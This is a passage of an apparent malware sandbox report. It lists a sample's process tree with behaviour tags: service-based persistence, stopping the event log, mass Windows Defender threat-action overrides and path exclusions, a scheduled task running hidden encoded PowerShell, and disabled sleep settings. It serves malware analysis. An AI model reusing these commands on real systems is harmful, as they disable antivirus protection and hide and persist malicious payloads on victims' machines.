    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4872
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3520
- C:\Users\Admin\Documents\SimpleAdobe\XuoCgWFoVXNBZg44KsVDooUD.exe
  C:\Users\Admin\Documents\SimpleAdobe\XuoCgWFoVXNBZg44KsVDooUD.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4780
  - - C:\ProgramData\AKEGDAKEHJ.exe
      "C:\ProgramData\AKEGDAKEHJ.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:2620
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 324
        5⤵
        Program crash
        
        PID:4208
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFIJJJEBGCFB" & exit
      4⤵
      PID:3568
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2296 -ip 2296
1⤵
PID:3620

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3784
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2020
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4636
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1560
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1336
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2532
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2620 -ip 2620
1⤵
PID:4304

C:\Users\Admin\AppData\Local\Temp\7zSC1BA.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC1BA.tmp\Install.exe 2Z /rIWdidbXI 385137 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1848
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4132
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:68
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bgwuTdWixDdNC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kwkuzFKVqEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\namDtuGKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wEnnazEvJNiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BRUhuLZnBvQZvqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\sFyaDrJXZzAeWCdu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1580
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bgwuTdWixDdNC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kwkuzFKVqEUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\namDtuGKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wEnnazEvJNiU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BRUhuLZnBvQZvqVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\sFyaDrJXZzAeWCdu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gOnzDggLy" /SC once /ST 12:13:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:620
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gOnzDggLy"
  2⤵
  PID:1416
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gOnzDggLy"
  2⤵
  PID:1580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KdMGsZYUagVlNoZLt" /SC once /ST 05:11:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\sFyaDrJXZzAeWCdu\MLDoSxAKjhHzlFg\gJyKMcC.exe\" WB /jnTJdidtk 385137 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "KdMGsZYUagVlNoZLt"
  2⤵
  PID:4808
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 912
  2⤵
  - Program crash
  PID:1624

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4824
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1348

C:\Windows\system32\svchost.exe
